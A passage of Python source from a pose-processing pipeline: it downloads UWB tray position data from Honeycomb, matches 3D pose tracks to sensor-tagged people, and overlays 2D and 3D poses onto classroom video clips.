client_secret (str): Honeycomb client secret (otherwise falls back on default strategy of MinimalHoneycombClient) (default is None)
task_progress_bar (bool): Boolean indicating whether script should display an overall progress bar (default is False)
notebook (bool): Boolean indicating whether script is being run in a Jupyter notebook (for progress bar display) (default is False)
Returns:
(str) Locally-generated inference ID for this run (identifies output data)
"""
if start.tzinfo is None:
logger.info('Specified start is timezone-naive. Assuming UTC')
start=start.replace(tzinfo=datetime.timezone.utc)
if end.tzinfo is None:
logger.info('Specified end is timezone-naive. Assuming UTC')
end=end.replace(tzinfo=datetime.timezone.utc)
if datapoint_timestamp_min is not None and datapoint_timestamp_min.tzinfo is None:
logger.info('Specified minimum datapoint timestamp is timezone-naive. Assuming UTC')
datapoint_timestamp_min=datapoint_timestamp_min.replace(tzinfo=datetime.timezone.utc)
if datapoint_timestamp_max is not None and datapoint_timestamp_max.tzinfo is None:
logger.info('Specified maximum datapoint timestamp is timezone-naive. Assuming UTC')
datapoint_timestamp_max=datapoint_timestamp_max.replace(tzinfo=datetime.timezone.utc)
logger.info('Downloading tray position data from Honeycomb. Base directory: {}. Pose processing data subdirectory: {}. Environment ID: {}. Start: {}. End: {}'.format(
base_dir,
pose_processing_subdirectory,
environment_id,
start,
end
))
processing_start = time.time()
logger.info('Generating metadata')
download_position_data_metadata = generate_metadata(
environment_id=environment_id,
pipeline_stage='download_position_data_trays',
parameters={
'datapoint_timestamp_min': datapoint_timestamp_min,
'datapoint_timestamp_max': datapoint_timestamp_max,
'start': start,
'end': end
}
)
download_position_data_trays_inference_id = download_position_data_metadata.get('inference_id')
logger.info('Writing inference metadata to local file')
process_pose_data.local_io.write_data_local(
data_object=download_position_data_metadata,
base_dir=base_dir,
pipeline_stage='download_position_data_trays',
environment_id=environment_id,
filename_stem='download_position_data_trays_metadata',
inference_id=download_position_data_metadata['inference_id'],
time_segment_start=None,
object_type='dict',
append=False,
sort_field=None,
pose_processing_subdirectory=pose_processing_subdirectory
)
logger.info('Generating list of time segments')
time_segment_start_list = process_pose_data.local_io.generate_time_segment_start_list(
start=start,
end=end
)
num_time_segments = len(time_segment_start_list)
num_minutes = (end - start).total_seconds()/60
logger.info('Downloading tray position data for {} time segments spanning {:.3f} minutes: {} to {}'.format(
num_time_segments,
num_minutes,
time_segment_start_list[0].isoformat(),
time_segment_start_list[-1].isoformat()
))
logger.info('Fetching tray tag info from Honeycomb for specified environment and time span')
tag_info = honeycomb_io.fetch_tag_info(
environment_id=environment_id,
environment_name=None,
start=start,
end=end,
chunk_size=chunk_size,
client=client,
uri=uri,
token_uri=token_uri,
audience=audience,
client_id=client_id,
client_secret=client_secret
)
tray_info = tag_info.loc[tag_info['entity_type'] == 'Tray'].copy()
device_ids = tray_info.index.unique().tolist()
assignment_ids = tray_info['assignment_id'].tolist()
logger.info('Found {} tray tags for specified environment and time span'.format(
len(device_ids)
))
if source_objects == 'position_objects':
logger.info('Fetching position objects for these tags and specified start/end and writing to local files')
if task_progress_bar:
if notebook:
time_segment_start_iterator = tqdm.notebook.tqdm(time_segment_start_list)
else:
time_segment_start_iterator = tqdm.tqdm(time_segment_start_list)
else:
time_segment_start_iterator = time_segment_start_list
for time_segment_start in time_segment_start_iterator:
position_data_df = honeycomb_io.fetch_cuwb_position_data(
start=time_segment_start - datetime.timedelta(milliseconds=500),
end=time_segment_start + datetime.timedelta(milliseconds=10500),
device_ids=device_ids,
environment_id=None,
environment_name=None,
device_types=['UWBTAG'],
output_format='dataframe',
sort_arguments=None,
chunk_size=1000,
client=client,
uri=uri,
token_uri=token_uri,
audience=audience,
client_id=client_id,
client_secret=client_secret
)
# There seem to be some duplicate records in Honeycomb
if position_data_df.duplicated(subset=set(position_data_df.columns).difference(['socket_read_time'])).any():
logger.warning('Duplicate position records found in time segment {}. Deleting duplicates.'.format(
time_segment_start.isoformat()
))
position_data_df.drop_duplicates(
subset=set(position_data_df.columns).difference(['socket_read_time']),
inplace=True
)
if len(position_data_df) == 0:
continue
position_data_df = (
position_data_df
.join(
(
tray_info
.reindex(columns=['tray_id', 'material_id'])
),
on='device_id'
)
.rename(columns={
'x': 'x_position',
'y': 'y_position',
'z': 'z_position'
})
.reindex(columns=[
'timestamp',
'tray_id',
'material_id',
'x_position',
'y_position',
'z_position'
])
)
position_data_df = poseconnect.identify.resample_sensor_data(
sensor_data=position_data_df,
id_field_names=[
'tray_id',
'material_id'
],
interpolation_field_names=[
'x_position',
'y_position',
'z_position'
],
timestamp_field_name='timestamp'
)
position_data_df = position_data_df.loc[
(position_data_df['timestamp'] >= time_segment_start) &
(position_data_df['timestamp'] < time_segment_start + datetime.timedelta(seconds=10))
]
process_pose_data.local_io.write_data_local(
data_object=position_data_df,
base_dir=base_dir,
pipeline_stage='download_position_data_trays',
environment_id=environment_id,
filename_stem='position_data_trays',
inference_id=download_position_data_trays_inference_id,
time_segment_start=time_segment_start,
object_type='dataframe',
append=False,
sort_field=None,
pose_processing_subdirectory=pose_processing_subdirectory
)
elif source_objects == 'datapoints':
logger.info('Fetching UWB datapoint IDs for these tags and specified datapoint timestamp min/max')
data_ids = honeycomb_io.fetch_uwb_data_ids(
datapoint_timestamp_min=datapoint_timestamp_min,
datapoint_timestamp_max=datapoint_timestamp_max,
assignment_ids=assignment_ids,
chunk_size=chunk_size,
client=client,
uri=uri,
token_uri=token_uri,
audience=audience,
client_id=client_id,
client_secret=client_secret
)
logger.info('Found {} UWB datapoint IDs for these tags and specified datapoint timestamp min/max'.format(
len(data_ids)
))
logger.info('Fetching position data from each of these UWB datapoints and writing to local files')
if task_progress_bar:
if notebook:
data_id_iterator = tqdm.notebook.tqdm(data_ids)
else:
data_id_iterator = tqdm.tqdm(data_ids)
else:
data_id_iterator = data_ids
for data_id in data_id_iterator:
position_data_df = honeycomb_io.fetch_uwb_data_data_id(
data_id=data_id,
client=client,
uri=uri,
token_uri=token_uri,
audience=audience,
client_id=client_id,
client_secret=client_secret
)
if len(position_data_df) == 0:
continue
position_data_df = honeycomb_io.extract_position_data(
df=position_data_df
)
if len(position_data_df) == 0:
continue
position_data_df = poseconnect.identify.resample_sensor_data(
sensor_data=position_data_df,
id_field_names=[
'assignment_id',
'object_id',
'serial_number',
],
interpolation_field_names=[
'x_position',
'y_position',
'z_position'
],
timestamp_field_name='timestamp'
)
position_data_df = position_data_df.join(
(
tag_info
.set_index('assignment_id')
.reindex(columns=['tray_id', 'material_id'])
),
how='inner',
on='assignment_id'
)
for time_segment_start in time_segment_start_list:
position_data_time_segment_df = position_data_df.loc[
(position_data_df['timestamp'] >= time_segment_start) &
(position_data_df['timestamp'] < time_segment_start + datetime.timedelta(seconds=10))
].reset_index(drop=True)
if len(position_data_time_segment_df) == 0:
continue
process_pose_data.local_io.write_data_local(
data_object=position_data_time_segment_df,
base_dir=base_dir,
pipeline_stage='download_position_data_trays',
environment_id=environment_id,
filename_stem='position_data_trays',
inference_id=download_position_data_trays_inference_id,
time_segment_start=time_segment_start,
object_type='dataframe',
append=True,
sort_field=None,
pose_processing_subdirectory=pose_processing_subdirectory
)
else:
raise ValueError('Source object specification \'{}\' not recognized'.format(
source_objects
))
processing_time = time.time() - processing_start
logger.info('Downloaded {:.3f} minutes of position data in {:.3f} minutes (ratio of {:.3f})'.format(
num_minutes,
processing_time/60,
(processing_time/60)/num_minutes
))
return download_position_data_trays_inference_id
def identify_pose_tracks_3d_local_by_segment(
base_dir,
environment_id,
download_position_data_inference_id,
pose_track_3d_interpolation_inference_id,
sensor_position_keypoint_index=None,
active_person_ids=None,
ignore_z=False,
min_fraction_matched=0.5,
max_distance=None,
return_match_statistics=False,
pose_processing_subdirectory='pose_processing',
task_progress_bar=False,
notebook=False
):
"""
Fetches 3D pose and pose track data and UWB position data from local files, matches pose tracks to people, and writes output back to local files.
Input data is assumed to be organized as specified by output of
reconstruct_poses_3d_local_by_time_segment(),
generate_pose_tracks_3d_local_by_time_segment(),
interpolate_pose_tracks_3d_local_by_pose_track(), and
download_position_data_by_datapoint().
The script looks up the inference IDs for the 3D pose tracks and 3D poses by
inspecting the metadata from the pose track interpolation run.
The sensor_position_keypoint_index can be an integer (same sensor position
for all people), a dictionary with person IDs as keys and sensor positions
as values (different sensor positions for different people), or None (uses
the median keypoint for each person).
If active person IDs are not specified, the script assumes all sensors
assigned to people are available to match.
Output data is saved as
\'BASE_DIR/POSE_PROCESSING_SUBDIRECTORY/pose_track_3d_identification/ENVIRONMENT_ID/pose_track_3d_identification_INFERENCE_ID.pkl\'.
Output metadata is saved as
\'BASE_DIR/POSE_PROCESSING_SUBDIRECTORY/pose_track_3d_identification/ENVIRONMENT_ID/pose_track_3d_identification_metadata_INFERENCE_ID.pkl\'.
Args:
base_dir (str): Base directory for local data (e.g., \'/data\')
environment_id (str): Honeycomb environment ID for source environment
download_position_data_inference_id (str): Inference ID for source position data
pose_track_3d_interpolation_inference_id (str): Inference ID for source pose track data
sensor_position_keypoint_index (int or dict): Index of keypoint(s) corresponding to UWB sensor on each person (default: None)
active_person_ids (sequence of str): List of Honeycomb person IDs for people known to be wearing active tags (default is None)
ignore_z (bool): Boolean indicating whether to ignore z dimension when comparing pose and sensor positions (default is False)
min_fraction_matched (float): Minimum fraction of poses in track which must match person for track to be identified as person (default is 0.5)
max_distance (float): Maximum distance between pose and sensor position for a match to be considered (default is None)
return_match_statistics (bool): Boolean indicating whether algorithm should return detailed match statistics along with inference ID (default is False)
pose_processing_subdirectory (str): subdirectory (under base directory) for all pose processing data (default is \'pose_processing\')
task_progress_bar (bool): Boolean indicating whether script should display an overall progress bar (default is False)
notebook (bool): Boolean indicating whether script is being run in a Jupyter notebook (for progress bar display) (default is False)
Returns:
(str) Locally-generated inference ID for this run (identifies output data)
(dataframe) Detailed match statistics (if requested)
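The min_fraction_matched filter can be illustrated with a plain-Python sketch
(the dicts below are hypothetical stand-ins for rows of the pose track
identification dataframe described above):

```python
# Hypothetical track identification results: for each 3D pose track,
# max_matches is the number of poses matched to the best-matching person
# and num_poses is the total number of poses in the track
tracks = [
    {'pose_track_3d_id': 'a', 'max_matches': 8, 'num_poses': 10},
    {'pose_track_3d_id': 'b', 'max_matches': 2, 'num_poses': 10},
]
min_fraction_matched = 0.5
# Keep only tracks whose fraction of matched poses meets the threshold
identified = [
    t for t in tracks
    if t['max_matches'] / t['num_poses'] >= min_fraction_matched
]
# Only track 'a' (fraction 0.8) survives the filter
```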
"""
pose_track_3d_interpolation_metadata = process_pose_data.local_io.fetch_data_local(
base_dir=base_dir,
pipeline_stage='pose_track_3d_interpolation',
environment_id=environment_id,
filename_stem='pose_track_3d_interpolation_metadata',
inference_ids=pose_track_3d_interpolation_inference_id,
data_ids=None,
sort_field=None,
time_segment_start=None,
object_type='dict',
pose_processing_subdirectory=pose_processing_subdirectory
)
start = pose_track_3d_interpolation_metadata['parameters']['start']
end = pose_track_3d_interpolation_metadata['parameters']['end']
pose_reconstruction_3d_inference_id = pose_track_3d_interpolation_metadata['parameters']['pose_reconstruction_3d_inference_id']
pose_tracking_3d_inference_id = pose_track_3d_interpolation_metadata['parameters']['pose_tracking_3d_inference_id']
logger.info('Identifying 3D pose tracks from local interpolated 3D pose track data and local UWB position data. Base directory: {}. Pose processing data subdirectory: {}. Environment ID: {}.'.format(
base_dir,
pose_processing_subdirectory,
environment_id
))
processing_start = time.time()
logger.info('Generating metadata')
pose_track_3d_identification_metadata = generate_metadata(
environment_id=environment_id,
pipeline_stage='pose_track_3d_identification',
parameters={
'pose_reconstruction_3d_inference_id': pose_reconstruction_3d_inference_id,
'pose_tracking_3d_inference_id': pose_tracking_3d_inference_id,
'pose_track_3d_interpolation_inference_id': pose_track_3d_interpolation_inference_id,
'start': start,
'end': end,
'sensor_position_keypoint_index': sensor_position_keypoint_index,
'active_person_ids': active_person_ids,
'ignore_z': ignore_z,
'min_fraction_matched': min_fraction_matched,
'return_match_statistics': return_match_statistics
}
)
logger.info('Writing inference metadata to local file')
process_pose_data.local_io.write_data_local(
data_object=pose_track_3d_identification_metadata,
base_dir=base_dir,
pipeline_stage='pose_track_3d_identification',
environment_id=environment_id,
filename_stem='pose_track_3d_identification_metadata',
inference_id=pose_track_3d_identification_metadata['inference_id'],
time_segment_start=None,
object_type='dict',
append=False,
sort_field=None,
pose_processing_subdirectory=pose_processing_subdirectory
)
pose_track_3d_identification_inference_id = pose_track_3d_identification_metadata['inference_id']
# Fetch pose track data
pose_tracks_3d_before_interpolation = process_pose_data.local_io.fetch_data_local(
base_dir=base_dir,
pipeline_stage='pose_tracking_3d',
environment_id=environment_id,
filename_stem='pose_tracks_3d',
inference_ids=pose_tracking_3d_inference_id,
data_ids=None,
sort_field=None,
time_segment_start=None,
object_type='dict',
pose_processing_subdirectory=pose_processing_subdirectory
)
pose_tracks_3d_from_interpolation = process_pose_data.local_io.fetch_data_local(
base_dir=base_dir,
pipeline_stage='pose_tracking_3d',
environment_id=environment_id,
filename_stem='pose_tracks_3d',
inference_ids=pose_track_3d_interpolation_inference_id,
data_ids=None,
sort_field=None,
time_segment_start=None,
object_type='dict',
pose_processing_subdirectory=pose_processing_subdirectory
)
pose_3d_ids_with_tracks_before_interpolation_df = process_pose_data.local_io.convert_pose_tracks_3d_to_df(
pose_tracks_3d=pose_tracks_3d_before_interpolation
)
pose_3d_ids_with_tracks_from_interpolation_df = process_pose_data.local_io.convert_pose_tracks_3d_to_df(
pose_tracks_3d=pose_tracks_3d_from_interpolation
)
pose_3d_ids_with_tracks_df = pd.concat(
(pose_3d_ids_with_tracks_before_interpolation_df, pose_3d_ids_with_tracks_from_interpolation_df)
).sort_values('pose_track_3d_id')
logger.info('Generating list of time segments')
time_segment_start_list = process_pose_data.local_io.generate_time_segment_start_list(
start=start,
end=end
)
num_time_segments = len(time_segment_start_list)
num_minutes = (end - start).total_seconds()/60
logger.info('Identifying pose tracks for {} time segments spanning {:.3f} minutes: {} to {}'.format(
num_time_segments,
num_minutes,
time_segment_start_list[0].isoformat(),
time_segment_start_list[-1].isoformat()
))
if task_progress_bar:
if notebook:
time_segment_start_iterator = tqdm.notebook.tqdm(time_segment_start_list)
else:
time_segment_start_iterator = tqdm.tqdm(time_segment_start_list)
else:
time_segment_start_iterator = time_segment_start_list
pose_identification_time_segment_df_list = list()
if return_match_statistics:
match_statistics_time_segment_df_list = list()
for time_segment_start in time_segment_start_iterator:
# Fetch 3D poses with tracks
poses_3d_time_segment_df = process_pose_data.local_io.fetch_data_local(
base_dir=base_dir,
pipeline_stage='pose_reconstruction_3d',
environment_id=environment_id,
filename_stem='poses_3d',
inference_ids=[
pose_reconstruction_3d_inference_id,
pose_track_3d_interpolation_inference_id
],
data_ids=None,
sort_field=None,
time_segment_start=time_segment_start,
object_type='dataframe',
pose_processing_subdirectory=pose_processing_subdirectory
)
if len(poses_3d_time_segment_df) == 0:
continue
poses_3d_with_tracks_time_segment_df = poses_3d_time_segment_df.join(pose_3d_ids_with_tracks_df, how='inner')
uwb_data_resampled_time_segment_df = process_pose_data.local_io.fetch_data_local(
base_dir=base_dir,
pipeline_stage='download_position_data',
environment_id=environment_id,
filename_stem='position_data',
inference_ids=download_position_data_inference_id,
data_ids=None,
sort_field=None,
time_segment_start=time_segment_start,
object_type='dataframe',
pose_processing_subdirectory=pose_processing_subdirectory
)
# Identify poses
if return_match_statistics:
pose_identification_time_segment_df, match_statistics_time_segment_df = poseconnect.identify.generate_pose_identification(
poses_3d_with_tracks=poses_3d_with_tracks_time_segment_df,
sensor_data_resampled=uwb_data_resampled_time_segment_df,
sensor_position_keypoint_index=sensor_position_keypoint_index,
active_person_ids=active_person_ids,
ignore_z=ignore_z,
max_distance=max_distance,
return_match_statistics=return_match_statistics
)
match_statistics_time_segment_df_list.append(match_statistics_time_segment_df)
else:
pose_identification_time_segment_df = poseconnect.identify.generate_pose_identification(
poses_3d_with_tracks=poses_3d_with_tracks_time_segment_df,
sensor_data_resampled=uwb_data_resampled_time_segment_df,
sensor_position_keypoint_index=sensor_position_keypoint_index,
active_person_ids=active_person_ids,
ignore_z=ignore_z,
max_distance=max_distance,
return_match_statistics=return_match_statistics
)
# Add to list
pose_identification_time_segment_df_list.append(pose_identification_time_segment_df)
pose_identification_df = pd.concat(pose_identification_time_segment_df_list)
pose_track_identification_df = poseconnect.identify.generate_pose_track_identification(
pose_identification=pose_identification_df
)
num_poses_df = pose_3d_ids_with_tracks_df.groupby('pose_track_3d_id').size().to_frame(name='num_poses')
pose_track_identification_df = pose_track_identification_df.join(num_poses_df, on='pose_track_3d_id')
pose_track_identification_df['fraction_matched'] = pose_track_identification_df['max_matches']/pose_track_identification_df['num_poses']
if min_fraction_matched is not None:
pose_track_identification_df = pose_track_identification_df.loc[pose_track_identification_df['fraction_matched'] >= min_fraction_matched]
process_pose_data.local_io.write_data_local(
data_object=pose_track_identification_df,
base_dir=base_dir,
pipeline_stage='pose_track_3d_identification',
environment_id=environment_id,
filename_stem='pose_track_3d_identification',
inference_id=pose_track_3d_identification_inference_id,
time_segment_start=None,
object_type='dataframe',
append=False,
sort_field=None,
pose_processing_subdirectory=pose_processing_subdirectory
)
processing_time = time.time() - processing_start
logger.info('Identified 3D pose tracks spanning {:.3f} minutes in {:.3f} minutes (ratio of {:.3f})'.format(
num_minutes,
processing_time/60,
(processing_time/60)/num_minutes
))
if return_match_statistics:
match_statistics_df = pd.concat(match_statistics_time_segment_df_list)
return pose_track_3d_identification_inference_id, match_statistics_df
return pose_track_3d_identification_inference_id
def overlay_poses_2d_local(
start,
end,
pose_extraction_2d_inference_id,
base_dir,
environment_id,
pose_model_id,
output_directory='./video_overlays',
output_filename_prefix='poses_2d',
camera_assignment_ids=None,
camera_device_types=None,
camera_device_ids=None,
camera_part_numbers=None,
camera_names=None,
camera_serial_numbers=None,
pose_processing_subdirectory='pose_processing',
chunk_size=100,
client=None,
uri=None,
token_uri=None,
audience=None,
client_id=None,
client_secret=None,
local_video_directory='./videos',
video_filename_extension='mp4',
camera_calibrations=None,
keypoint_connectors=None,
pose_color='green',
keypoint_radius=3,
keypoint_alpha=0.6,
keypoint_connector_alpha=0.6,
keypoint_connector_linewidth=3,
output_filename_datetime_format='%Y%m%d_%H%M%S_%f',
output_filename_extension='avi',
output_fourcc_string='XVID',
concatenate_videos=True,
delete_individual_clips=True,
parallel=False,
num_parallel_processes=None,
task_progress_bar=False,
segment_progress_bar=False,
notebook=False
):
"""
Fetches 2D pose data from local files and overlays onto classroom videos.
Fetches and overlays onto all video clips that overlap with specified start
and end (e.g., if start is 10:32:56 and end is 10:33:20, returns videos
starting at 10:32:50, 10:33:00 and 10:33:10).
Script performs a logical AND across all camera specifications. If no camera
specifications are given, returns all active cameras in environment (as
determined by camera_device_types).
If keypoint connectors are not specified, script uses default keypoint
connectors for specified pose model.
Colors can be specified as any string interpretable by
matplotlib.colors.to_hex().
Input data is assumed to be organized as specified by
extract_poses_2d_alphapose_local_by_time_segment().
Args:
start (datetime): Start of video overlay
end (datetime): End of video overlay
pose_extraction_2d_inference_id (str): Inference ID for source 2D pose data
base_dir (str): Base directory for local data (e.g., \'/data\')
environment_id (str): Honeycomb environment ID for source environment
pose_model_id (str): Honeycomb pose model ID for pose model that defines 2D/3D pose data structure
output_directory (str): Path to output directory (default is \'./video_overlays\')
output_filename_prefix (str): Filename prefix for output files (default is \'poses_2d\')
camera_assignment_ids (sequence of str): List of Honeycomb assignment IDs for target cameras (default is None)
camera_device_types (sequence of str): List of Honeycomb device types for target cameras (default is video_io.DEFAULT_CAMERA_DEVICE_TYPES)
camera_device_ids (sequence of str): List of Honeycomb device IDs for target cameras (default is None)
camera_part_numbers (sequence of str): List of Honeycomb part numbers for target cameras (default is None)
camera_names (sequence of str): List of Honeycomb device names for target cameras (default is None)
camera_serial_numbers (sequence of str): List of Honeycomb device serial numbers for target cameras (default is None)
pose_processing_subdirectory (str): subdirectory (under base directory) for all pose processing data (default is \'pose_processing\')
local_video_directory (str): Path to directory where local copies of Honeycomb videos are stored (default is \'./videos\')
video_filename_extension (str): Filename extension for local copies of Honeycomb videos (default is \'mp4\')
camera_calibrations (dict): Dict in format {DEVICE_ID: CAMERA_CALIBRATION_DATA} (default is None)
keypoint_connectors (array): Array of keypoints to connect with lines to form pose image (default is None)
pose_color (str): Color of pose (default is \'green\')
keypoint_radius (int): Radius of keypoints in pixels (default is 3)
keypoint_alpha (float): Alpha value for keypoints (default is 0.6)
keypoint_connector_alpha (float): Alpha value for keypoint connectors (default is 0.6)
keypoint_connector_linewidth (float): Line width for keypoint connectors (default is 3.0)
output_filename_datetime_format (str): Datetime format for output filename (default is \'%Y%m%d_%H%M%S_%f\')
output_filename_extension (str): Filename extension for output (determines file format) (default is \'avi\')
output_fourcc_string (str): FOURCC code for output format (default is \'XVID\')
concatenate_videos (bool): Boolean indicating whether to concatenate videos for each camera into single videos (default is True)
delete_individual_clips (bool): Boolean indicating whether to delete individual clips after concatenating (default is True)
parallel (bool): Boolean indicating whether to use multiple parallel processes (one for each time segment) (default is False)
num_parallel_processes (int): Number of parallel processes in pool (otherwise defaults to number of cores - 1) (default is None)
task_progress_bar (bool): Boolean indicating whether script should display an overall progress bar (default is False)
segment_progress_bar (bool): Boolean indicating whether script should display a progress bar for each clip (default is False)
notebook (bool): Boolean indicating whether script is being run in a Jupyter notebook (for progress bar display) (default is False)
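The clip alignment described above (video clips start on 10-second
boundaries, and all clips overlapping the start/end span are fetched) can be
sketched as follows; the helper name is hypothetical, not part of this
package's API:

```python
import datetime

def video_clip_starts(start, end, clip_length=10):
    # Hypothetical helper: floor start to the previous clip_length-second
    # boundary, then step forward in clip_length increments until end
    first = start - datetime.timedelta(
        seconds=start.second % clip_length,
        microseconds=start.microsecond
    )
    starts = []
    t = first
    while t < end:
        starts.append(t)
        t += datetime.timedelta(seconds=clip_length)
    return starts

starts = video_clip_starts(
    datetime.datetime(2021, 6, 1, 10, 32, 56),
    datetime.datetime(2021, 6, 1, 10, 33, 20)
)
# Clips start at 10:32:50, 10:33:00, and 10:33:10, matching the example above
```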
"""
poses_2d_df = process_pose_data.local_io.fetch_data_local_by_time_segment(
start=start,
end=end,
base_dir=base_dir,
pipeline_stage='pose_extraction_2d',
environment_id=environment_id,
filename_stem='poses_2d',
inference_ids=pose_extraction_2d_inference_id,
data_ids=None,
sort_field=None,
object_type='dataframe',
pose_processing_subdirectory=pose_processing_subdirectory
)
poses_2d_df = process_pose_data.local_io.convert_assignment_ids_to_camera_device_ids(poses_2d_df)
process_pose_data.overlay.overlay_poses(
poses_df=poses_2d_df,
start=start,
end=end,
camera_assignment_ids=camera_assignment_ids,
environment_id=environment_id,
environment_name=None,
camera_device_types=camera_device_types,
camera_device_ids=camera_device_ids,
camera_part_numbers=camera_part_numbers,
camera_names=camera_names,
camera_serial_numbers=camera_serial_numbers,
chunk_size=chunk_size,
client=client,
uri=uri,
token_uri=token_uri,
audience=audience,
client_id=client_id,
client_secret=client_secret,
local_video_directory=local_video_directory,
video_filename_extension=video_filename_extension,
pose_model_id=pose_model_id,
camera_calibrations=None,
pose_label_column=None,
keypoint_connectors=keypoint_connectors,
pose_color=pose_color,
keypoint_radius=keypoint_radius,
keypoint_alpha=keypoint_alpha,
keypoint_connector_alpha=keypoint_connector_alpha,
keypoint_connector_linewidth=keypoint_connector_linewidth,
output_directory=output_directory,
output_filename_prefix=output_filename_prefix,
output_filename_datetime_format=output_filename_datetime_format,
output_filename_extension=output_filename_extension,
output_fourcc_string=output_fourcc_string,
concatenate_videos=concatenate_videos,
delete_individual_clips=delete_individual_clips,
parallel=parallel,
num_parallel_processes=num_parallel_processes,
task_progress_bar=task_progress_bar,
segment_progress_bar=segment_progress_bar,
notebook=notebook
)
def overlay_poses_3d_local(
start,
end,
pose_reconstruction_3d_inference_id,
base_dir,
environment_id,
pose_model_id,
output_directory='./video_overlays',
output_filename_prefix='poses_3d',
camera_assignment_ids=None,
camera_device_types=None,
camera_device_ids=None,
camera_part_numbers=None,
camera_names=None,
camera_serial_numbers=None,
pose_processing_subdirectory='pose_processing',
chunk_size=100,
client=None,
uri=None,
token_uri=None,
audience=None,
client_id=None,
client_secret=None,
local_video_directory='./videos',
video_filename_extension='mp4',
camera_calibrations=None,
keypoint_connectors=None,
pose_color='green',
keypoint_radius=3,
keypoint_alpha=0.6,
keypoint_connector_alpha=0.6,
keypoint_connector_linewidth=3,
output_filename_datetime_format='%Y%m%d_%H%M%S_%f',
output_filename_extension='avi',
output_fourcc_string='XVID',
concatenate_videos=True,
delete_individual_clips=True,
parallel=False,
num_parallel_processes=None,
task_progress_bar=False,
segment_progress_bar=False,
notebook=False
):
"""
Fetches 3D pose data from local files and overlays onto classroom videos.
Fetches and overlays onto all video clips that overlap with specified start
and end (e.g., if start is 10:32:56 and end is 10:33:20, returns videos
starting at 10:32:50, 10:33:00 and 10:33:10).
Script performs a logical AND across all camera specifications. If no camera
specifications are given, returns all active cameras in environment (as
determined by camera_device_types).
If keypoint connectors are not specified, script uses default keypoint
connectors for specified pose model.
Colors can be specified as any string interpretable by
matplotlib.colors.to_hex().
Input data is assumed to be organized as specified by output of
reconstruct_poses_3d_local_by_time_segment().
Args:
start (datetime): Start of video overlay
end (datetime): End of video overlay
pose_reconstruction_3d_inference_id (str): Inference ID for source 3D pose data
base_dir (str): Base directory for local data (e.g., \'/data\')
environment_id (str): Honeycomb environment ID for source environment
pose_model_id (str): Honeycomb pose model ID for pose model that defines 2D/3D pose data structure
output_directory (str): Path to output directory (default is \'./video_overlays\')
output_filename_prefix (str): Filename prefix for output files (default is \'poses_3d\')
camera_assignment_ids (sequence of str): List of Honeycomb assignment IDs for target cameras (default is None)
camera_device_types (sequence of str): List of Honeycomb device types for target cameras (default is video_io.DEFAULT_CAMERA_DEVICE_TYPES)
camera_device_ids (sequence of str): List of Honeycomb device IDs for target cameras (default is None)
camera_part_numbers (sequence of str): List of Honeycomb part numbers for target cameras (default is None)
camera_names (sequence of str): List of Honeycomb device names for target cameras (default is None)
camera_serial_numbers (sequence of str): List of Honeycomb device serial numbers for target cameras (default is None)
pose_processing_subdirectory (str): subdirectory (under base directory) for all pose processing data (default is \'pose_processing\')
local_video_directory (str): Path to directory where local copies of Honeycomb videos are stored (default is \'./videos\')
video_filename_extension (str): Filename extension for local copies of Honeycomb videos (default is \'mp4\')
camera_calibrations (dict): Dict in format {DEVICE_ID: CAMERA_CALIBRATION_DATA} (default is None)
keypoint_connectors (array): Array of keypoints to connect with lines to form pose image (default is None)
pose_color (str): Color of pose (default is \'green\')
keypoint_radius (int): Radius of keypoints in pixels (default is 3)
keypoint_alpha (float): Alpha value for keypoints (default is 0.6)
keypoint_connector_alpha (float): Alpha value for keypoint connectors (default is 0.6)
keypoint_connector_linewidth (float): Line width for keypoint connectors (default is 3.0)
output_filename_datetime_format (str): Datetime format for output filename (default is \'%Y%m%d_%H%M%S_%f\')
output_filename_extension (str): Filename extension for output (determines file format) (default is \'avi\')
output_fourcc_string (str): FOURCC code for output format (default is \'XVID\')
concatenate_videos (bool): Boolean indicating whether to concatenate videos for each camera into single videos (default is True)
delete_individual_clips (bool): Boolean indicating whether to delete individual clips after concatenating (default is True)
parallel (bool): Boolean indicating whether to use multiple parallel processes (one for each time segment) (default is False)
num_parallel_processes (int): Number of parallel processes in pool (otherwise defaults to number of cores - 1) (default is None)
task_progress_bar (bool): Boolean indicating whether script should display an overall progress bar (default is False)
segment_progress_bar (bool): Boolean indicating whether script should display a progress bar for each clip (default is False)
notebook (bool): Boolean indicating whether script is being run in a Jupyter notebook (for progress bar display) (default is False)
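The output_filename_datetime_format default produces timestamps like the
following (a standard-library sketch; the datetime value is an arbitrary
example):

```python
import datetime

# Default format for timestamps embedded in output overlay filenames
fmt = '%Y%m%d_%H%M%S_%f'
stamp = datetime.datetime(2021, 6, 1, 10, 32, 50).strftime(fmt)
# stamp == '20210601_103250_000000'
```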
"""
poses_3d_df = process_pose_data.local_io.fetch_data_local_by_time_segment(
start=start,
end=end,
base_dir=base_dir,
pipeline_stage='pose_reconstruction_3d',
environment_id=environment_id,
filename_stem='poses_3d',
inference_ids=pose_reconstruction_3d_inference_id,
data_ids=None,
sort_field=None,
object_type='dataframe',
pose_processing_subdirectory=pose_processing_subdirectory
)
process_pose_data.overlay.overlay_poses(
poses_df=poses_3d_df,
start=start,
end=end,
camera_assignment_ids=camera_assignment_ids,
environment_id=environment_id,
environment_name=None,
camera_device_types=camera_device_types,
camera_device_ids=camera_device_ids,
camera_part_numbers=camera_part_numbers,
camera_names=camera_names,
camera_serial_numbers=camera_serial_numbers,
chunk_size=chunk_size,
client=client,
uri=uri,
token_uri=token_uri,
audience=audience,
client_id=client_id,
client_secret=client_secret,
local_video_directory=local_video_directory,
video_filename_extension=video_filename_extension,
pose_model_id=pose_model_id,
camera_calibrations=None,
pose_label_column=None,
keypoint_connectors=keypoint_connectors,
pose_color=pose_color,
keypoint_radius=keypoint_radius,
keypoint_alpha=keypoint_alpha,
keypoint_connector_alpha=keypoint_connector_alpha,
keypoint_connector_linewidth=keypoint_connector_linewidth,
output_directory=output_directory,
output_filename_prefix=output_filename_prefix,
output_filename_datetime_format=output_filename_datetime_format,
output_filename_extension=output_filename_extension,
output_fourcc_string=output_fourcc_string,
concatenate_videos=concatenate_videos,
delete_individual_clips=delete_individual_clips,
parallel=parallel,
num_parallel_processes=num_parallel_processes,
task_progress_bar=task_progress_bar,
segment_progress_bar=segment_progress_bar,
notebook=notebook
)
def overlay_pose_tracks_3d_uninterpolated_local(
start,
end,
pose_tracking_3d_inference_id,
base_dir,
environment_id,
pose_model_id,
output_directory='./video_overlays',
output_filename_prefix='pose_tracks_3d_uninterpolated',
camera_assignment_ids=None,
camera_device_types=None,
camera_device_ids=None,
camera_part_numbers=None,
camera_names=None,
camera_serial_numbers=None,
